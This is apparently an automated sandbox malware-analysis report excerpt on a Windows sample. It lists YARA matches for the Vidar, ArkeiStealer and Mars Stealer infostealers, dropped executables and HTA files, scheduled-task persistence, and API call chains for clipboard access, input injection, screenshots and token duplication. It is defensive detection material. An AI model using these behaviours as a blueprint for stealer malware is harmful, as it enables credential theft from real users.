Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_009461F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006AAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006D9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

System Summary

Source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
Source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detect Mars Stealer based on a specific XOR routine Author: Sekoia.io
Source: 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY | Matched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
Source: Process Memory Space: m0wsoI3.exe PID: 5132, type: MEMORYSTR | Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: decrypted.memstr, type: MEMORYSTR | Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 8e933e9d51.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 8e933e9d51.exe, 00000012.00000002.1531510429.0000000000702000.00000002.00000001.01000000.00000011.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 8e933e9d51.exe, 00000012.00000002.1531510429.0000000000702000.00000002.00000001.01000000.00000011.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | File created: C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Temp\J9hHfTRUK.hta
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | File created: C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta
Source: M6gQuZPvgY.exe | Static PE information: section name:
Source: M6gQuZPvgY.exe | Static PE information: section name: .idata
Source: M6gQuZPvgY.exe | Static PE information: section name:
Source: rapes.exe.0.dr | Static PE information: section name:
Source: rapes.exe.0.dr | Static PE information: section name: .idata
Source: rapes.exe.0.dr | Static PE information: section name:
Source: UD49QH6[1].exe.6.dr | Static PE information: section name:
Source: UD49QH6[1].exe.6.dr | Static PE information: section name: .idata
Source: UD49QH6[1].exe.6.dr | Static PE information: section name:
Source: UD49QH6.exe.6.dr | Static PE information: section name:
Source: UD49QH6.exe.6.dr | Static PE information: section name: .idata
Source: UD49QH6.exe.6.dr | Static PE information: section name:
Source: random[1].exe0.6.dr | Static PE information: section name:
Source: random[1].exe0.6.dr | Static PE information: section name: .idata
Source: random[1].exe0.6.dr | Static PE information: section name:
Source: c1f0508103.exe.6.dr | Static PE information: section name:
Source: c1f0508103.exe.6.dr | Static PE information: section name: .idata
Source: c1f0508103.exe.6.dr | Static PE information: section name:
Source: random[2].exe.6.dr | Static PE information: section name:
Source: random[2].exe.6.dr | Static PE information: section name: .idata
Source: random[2].exe.6.dr | Static PE information: section name:
Source: 83f34278c7.exe.6.dr | Static PE information: section name:
Source: 83f34278c7.exe.6.dr | Static PE information: section name: .idata
Source: 83f34278c7.exe.6.dr | Static PE information: section name:
Source: random[1].exe1.6.dr | Static PE information: section name:
Source: random[1].exe1.6.dr | Static PE information: section name: .idata
Source: random[1].exe1.6.dr | Static PE information: section name:
Source: 0629403be8.exe.6.dr | Static PE information: section name:
Source: 0629403be8.exe.6.dr | Static PE information: section name: .idata
Source: 0629403be8.exe.6.dr | Static PE information: section name:
Source: random[1].exe2.6.dr | Static PE information: section name:
Source: random[1].exe2.6.dr | Static PE information: section name: .idata
Source: random[1].exe2.6.dr | Static PE information: section name:
Source: d101bd5267.exe.6.dr | Static PE information: section name:
Source: d101bd5267.exe.6.dr | Static PE information: section name: .idata
Source: d101bd5267.exe.6.dr | Static PE information: section name:
Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.dr | Static PE information: section name:
Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.dr | Static PE information: section name: .idata
Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.dr | Static PE information: section name:
Source: m0wsoI3[1].exe.6.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: m0wsoI3.exe.6.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: m0wsoI3[1].exe.6.dr | Static PE information: section name:
Source: m0wsoI3.exe.6.dr | Static PE information: section name:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\TempLFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006AD5EB: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | File created: C:\Windows\Tasks\rapes.job
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | File created: C:\Windows\Tasks\futors.job
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File created: C:\Windows\SysWOW64\Z58QQI5P
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File created: C:\Windows\SysWOW64\7YMOHDTJ
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File created: C:\Windows\SysWOW64\HVKNYMGD
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File created: C:\Windows\SysWOW64\SR1N7QIE
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File created: C:\Windows\SysWOW64\EKNG4EUS
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File created: C:\Windows\SysWOW64\Y58Q9ZM7
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File created: C:\Windows\SysWOW64\3OH479ZM
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File created: C:\Windows\SysWOW64\00HDTR9Z
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | File deleted: C:\Windows\SysWOW64\Z58QQI5P
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_009461F0
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_00984047
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_0097C6DD
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_00972C20
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_00944EF0
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_0097CE69
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_009451A0
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_0096B4C0
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_00945450
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_0096F6DB
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_009818D7
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_00985CD4
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_00985DF4
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_00424047
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_003E61F0
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_0041C6DD
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_00412C20
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_0041CE69
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_003E4EF0
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_003E51A0
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_003E5450
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_0040B4C0
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_0040F6DB
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_004218D7
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_00425CD4
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Code function: 14_2_00425DF4
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_0041B020
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_00410F00
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_0041A790
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_0041A190
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_0041A5A0
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_004107B0
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_6095C314
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_6094DA3A
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_609660FA
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_6092114F
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_6091F2C9
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_6096923E
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Code function: 17_2_6093323D
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6095031217_2_60950312
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6094D33B17_2_6094D33B
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6093B36817_2_6093B368
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6096748C17_2_6096748C
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6093F42E17_2_6093F42E
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6095447017_2_60954470
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_609615FA17_2_609615FA
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6096A5EE17_2_6096A5EE
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6096D6A417_2_6096D6A4
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_609606A817_2_609606A8
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6093265417_2_60932654
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6095566517_2_60955665
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6094B7DB17_2_6094B7DB
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6092F74D17_2_6092F74D
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6096480717_2_60964807
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6094E9BC17_2_6094E9BC
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6093792917_2_60937929
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6093FAD617_2_6093FAD6
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6096DAE817_2_6096DAE8
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60936B2717_2_60936B27
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60954CF617_2_60954CF6
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60950C6B17_2_60950C6B
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60966DF117_2_60966DF1
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60963D3517_2_60963D35
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60909E9C17_2_60909E9C
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60951E8617_2_60951E86
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60912E0B17_2_60912E0B
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60954FF817_2_60954FF8
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0064806018_2_00648060
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B204618_2_006B2046
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006A829818_2_006A8298
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0067E4FF18_2_0067E4FF
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0067676B18_2_0067676B
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006D487318_2_006D4873
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0064CAF018_2_0064CAF0
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0066CAA018_2_0066CAA0
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0065CC3918_2_0065CC39
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00676DD918_2_00676DD9
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0065D06418_2_0065D064
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0065B11918_2_0065B119
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006491C018_2_006491C0
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0066139418_2_00661394
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0066170618_2_00661706
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0066781B18_2_0066781B
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0065997D18_2_0065997D
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0064792018_2_00647920
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006619B018_2_006619B0
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00667A4A18_2_00667A4A
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00661C7718_2_00661C77
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00667CA718_2_00667CA7
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006CBE4418_2_006CBE44
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00679EEE18_2_00679EEE
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0064BF4018_2_0064BF40
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00661F3218_2_00661F32
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Code function: String function: 00403F50 appears 136 times
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Code function: String function: 0040A570 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe Code function: String function: 0096A570 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe Code function: String function: 00963F50 appears 136 times
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: String function: 004054F0 appears 577 times
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe Code function: String function: 0065F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe Code function: String function: 00660A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 888
Source: unicodedata.pyd.35.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: win32ui.pyd.35.dr Static PE information: Resource name: RT_CURSOR type: 64-bit XCOFF executable or object module
Source: win32ui.pyd.35.dr Static PE information: Resource name: None type: COM executable for DOS
Source: api-ms-win-core-file-l1-2-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: python3.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.35.dr Static PE information: No import functions for PE file found
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: M6gQuZPvgY.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
Source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_mars_stealer_xor_routine author = Sekoia.io, description = Detect Mars Stealer based on a specific XOR routine, creation_date = 2022-04-06, classification = TLP:CLEAR, version = 1.0, id = 3e2c7440b2fc9e4b039e6fa8152ac8ff
Source: 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
